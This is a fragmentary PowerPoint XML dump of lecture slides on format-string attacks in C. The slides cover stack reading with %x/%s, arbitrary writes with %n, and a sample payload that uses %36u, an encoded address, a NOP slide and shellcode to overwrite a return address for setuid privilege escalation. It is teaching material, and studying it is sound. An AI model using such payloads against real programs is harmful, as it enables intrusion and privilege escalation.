              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> on the call stack, thus we can walk to it with the correct specifiers.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4491" y="5562600"/>
            <a:ext cx="370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if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>fmt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> is “%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>x%s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>”?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Arc 19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1.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foo(char *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2.    char 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3.    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>strcpy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=&gt;    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng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5.  }</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1666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Specific Address—2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foo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94546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buf’s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other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28 bytes)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0xbffff747</a:t>
                      </a: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stale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Arc 19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5052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Idea! Encode address to peek in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> first. Address </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>0xbffff747</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> is</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>\x47\xf7\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>xff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>xbf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/>
              <a:t>in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" i="1" dirty="0"/>
              <a:t>little endian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="28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1" y="563843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/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>\x47\xf7\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>xff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>xbf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>%x%s</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:cs typeface="Consola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1.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foo(char *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2.    char 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3.    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>strcpy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buf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fmt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=&gt;    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng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5.  }</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2494781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return address with buffer-overflow induced by format string</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Writing any value to any address directly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%n format specifier for writing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writing (some value) to a specific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controlling the written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4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does:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="hu-HU" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>    int a;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="hu-HU" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>    printf(”-%10u-%n", 7350, &amp;a);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="hu-HU" dirty="0"/>
              <a:t>print?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9300" y="4876800"/>
            <a:ext cx="5105400" cy="990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      7350-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3886200"/>
            <a:ext cx="3200400" cy="838200"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -95411"/>
              <a:gd name="adj2" fmla="val -14140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Print argument padded to 10 digits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76600" y="2895600"/>
            <a:ext cx="1981200" cy="3876898"/>
            <a:chOff x="3276600" y="2895600"/>
            <a:chExt cx="1981200" cy="387689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276600" y="3048000"/>
              <a:ext cx="609600" cy="22860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114800" y="5547518"/>
              <a:ext cx="0" cy="639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38454" y="5547518"/>
              <a:ext cx="0" cy="639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57600" y="6126167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 </a:t>
              </a:r>
              <a:br>
                <a:rPr lang="en-US" dirty="0"/>
              </a:br>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t>spaces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70405" y="6126167"/>
              <a:ext cx="7360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 </a:t>
              </a:r>
              <a:br>
                <a:rPr lang="en-US" dirty="0"/>
              </a:br>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t>digits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96291" y="2895600"/>
              <a:ext cx="761509" cy="24384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Overflow by Format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085" y="1589012"/>
            <a:ext cx="4434115" cy="925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char </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>[32];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sprintf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buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>, user);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44584" y="3797301"/>
            <a:ext cx="6199415" cy="681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“%36u\x3c\xd3\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>xff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>xbf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>nops</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&gt;&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&gt;”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904670" y="4698746"/>
            <a:ext cx="2810330" cy="1070267"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -26752"/>
              <a:gd name="adj2" fmla="val -10020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36 digit decimal, overwriting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>buf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caller’s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252685" y="2957286"/>
            <a:ext cx="2231571" cy="632556"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -22033"/>
              <a:gd name="adj2" fmla="val 9321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Overwrite</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>return address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382657" y="4730774"/>
            <a:ext cx="1846943" cy="632556"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -35393"/>
              <a:gd name="adj2" fmla="val -13224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Shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> with</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> slide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7935" y="5056629"/>
            <a:ext cx="492443" cy="8489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/>
              <a:t>sprintf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Left Brace 22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foo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70707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(32 bytes)</a:t>
                      </a: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Arc 26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BB79-C74E-4D27-B07D-6C15107A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6B-B253-415B-824A-027C78B5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get superuser if “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>setuid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setuid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>” enables escalating permissions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CD75-63DC-4173-913E-F73E8E73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6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40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%n Format Specifier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%n writes the number of bytes printed so far to an integer specified by its address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printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>(“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>abcde%n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>\n”,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*) &amp;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printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>(“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%d\n”,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Output: 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abcde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60</a:t>
            </a:fld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4953000" y="4939963"/>
            <a:ext cx="3505200" cy="927437"/>
          </a:xfrm>
          <a:prstGeom prst="foldedCorner">
            <a:avLst>
              <a:gd name="adj" fmla="val 11045"/>
            </a:avLst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bIns="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(“%0*d”, 5, 42);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=&gt; 00042</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10285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%n Format Specifier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%n writes the number of bytes printed so far to an integer specified by its address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printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>(“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>abcde%n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>\n”,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*) &amp;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printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>(“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%d\n”,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Output: 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abcde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7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Writing to Specific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Encode address in format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Writes a small </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>num</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> at destination </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>0xbfffc8c0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Can use four carefully-controlled writes to create an address at destination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341" y="2133600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"\xc0\xc8\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>xff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>\xbf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>_%08x ….%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>08x.%n"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62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057070" y="3044533"/>
            <a:ext cx="2810330" cy="1070267"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 3979"/>
              <a:gd name="adj2" fmla="val -10252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“pop” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dwords</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>from stack to reach</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>format string</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4104893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09339"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1533978" y="3733800"/>
          <a:ext cx="6076045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7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Line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  <a:r>
                        <a:rPr lang="en-US" baseline="0" dirty="0"/>
                        <a:t> (little endian)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canary (little endian)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00 00 00 00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41 41 41 41 00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10 00</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" baseline="0" dirty="0"/>
                        <a:t> 00 00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41 41 41 41 00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10 20 00 00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r>
                        <a:rPr lang="en-US" baseline="0" dirty="0"/>
                        <a:t> 41 41 41 00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10 20 40 00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00 00 41 41 00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10 20 40 80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00 00 00 41 00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1733" y="283868"/>
            <a:ext cx="68405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unsigned char canary[5];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unsigned char foo[4];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memset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> (foo, ’\x00’, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>sizeof</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> (foo));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/* 0 */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 (canary, "AAAA");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/* 1 */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 ("%16u%n", 7350, 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*) &amp;foo[0]);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/* 2 */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 ("%32u%n", 7350, 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*) &amp;foo[1]);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/* 3 */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 ("%64u%n", 7350, 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*) &amp;foo[2]);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/* 4 */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 ("%128u%n", 7350, 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*) &amp;foo[3]);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/* 5 * after */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 ("%02x%02x%02x%02x\n", </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>                          foo[0], foo[1], foo[2], foo[3]); </a:t>
            </a:r>
          </a:p>
          <a:p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("canary: %02x%02x%02x%02x\n", </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>               canary[0], canary[1], canary[2], canary[3]); </a:t>
            </a:r>
          </a:p>
          <a:p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392" y="6350000"/>
            <a:ext cx="260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taken directly from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2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Arbitrary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Suppose we want to write 0x10204080.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(e.g., for GOT attack in next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1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133600"/>
            <a:ext cx="5895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unsigned char canary[5];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unsigned char foo[4];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memset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> (foo, ’\x00’,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 (foo));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0. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> (canary, "AAAA");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1.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("%16u%n",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&amp;foo[0]);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2.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("%32u%n",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&amp;foo[1]);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3.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("%64u%n",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&amp;foo[2]);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4.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("%128u%n",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&amp;foo[3]); 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392" y="6350000"/>
            <a:ext cx="260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taken directly from reading</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="124" name="Title 1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Arbitrary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3254521"/>
            <a:ext cx="5791200" cy="12415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89" name="Table 1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04844"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6550326" y="1585741"/>
          <a:ext cx="76487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9" name="Line 106"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4243388" y="1912938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ight Brace 181"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7391400" y="2040354"/>
            <a:ext cx="228600" cy="1676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701948" y="2693888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canary</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="184" name="Right Brace 183"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7391400" y="3886200"/>
            <a:ext cx="228600" cy="1422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01948" y="4412734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558944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133600"/>
            <a:ext cx="5895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unsigned char canary[5];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unsigned char foo[4];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memset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> (foo, ’\x00’,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 (foo));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0. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> (canary, "AAAA");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1.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("%16u%n",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&amp;foo[0]);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2.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("%32u%n",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&amp;foo[1]);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3.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("%64u%n",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&amp;foo[2]);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4.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("%128u%n",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&amp;foo[3]); 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392" y="6350000"/>
            <a:ext cx="260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taken directly from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66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391400" y="2040354"/>
            <a:ext cx="228600" cy="1676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01948" y="2693888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canary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391400" y="3886200"/>
            <a:ext cx="228600" cy="1422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1948" y="4412734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559076"/>
            <a:ext cx="5791200" cy="12415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89" name="Table 1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8039"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6550326" y="1585741"/>
          <a:ext cx="76487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9" name="Line 106"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4243388" y="1912938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2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Writing Arbitrary Values</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1876749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133600"/>
            <a:ext cx="5895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unsigned char canary[5];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unsigned char foo[4];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memset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> (foo, ’\x00’,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 (foo));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0. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> (canary, "AAAA");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1.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("%16u%n",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&amp;foo[0]);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2.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("%32u%n",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&amp;foo[1]);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3.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("%64u%n",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&amp;foo[2]);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4.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("%128u%n",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&amp;foo[3]); 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392" y="6350000"/>
            <a:ext cx="260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taken directly from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67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391400" y="2040354"/>
            <a:ext cx="228600" cy="1676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01948" y="2693888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canary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391400" y="3886200"/>
            <a:ext cx="228600" cy="1422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1948" y="4412734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863876"/>
            <a:ext cx="5791200" cy="12415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89" name="Table 1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89484"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6550326" y="1585741"/>
          <a:ext cx="76487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9" name="Line 106"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4243388" y="1912938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2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Writing Arbitrary Values</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3448485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133600"/>
            <a:ext cx="5895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unsigned char canary[5];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unsigned char foo[4];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memset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> (foo, ’\x00’,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 (foo));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0. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> (canary, "AAAA");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1.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("%16u%n",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&amp;foo[0]);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2.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("%32u%n",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&amp;foo[1]);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3.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("%64u%n",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&amp;foo[2]);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4.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("%128u%n",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&amp;foo[3]); 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392" y="6350000"/>
            <a:ext cx="260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taken directly from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68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391400" y="2040354"/>
            <a:ext cx="228600" cy="1676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01948" y="2693888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canary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391400" y="3886200"/>
            <a:ext cx="228600" cy="1422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1948" y="4412734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4092476"/>
            <a:ext cx="5791200" cy="12415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89" name="Table 1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85832"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6550326" y="1585741"/>
          <a:ext cx="76487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9" name="Line 106"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4243388" y="1912938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2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Writing Arbitrary Values</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="107757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133600"/>
            <a:ext cx="5895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unsigned char canary[5];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unsigned char foo[4];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memset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> (foo, ’\x00’,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 (foo));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0. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
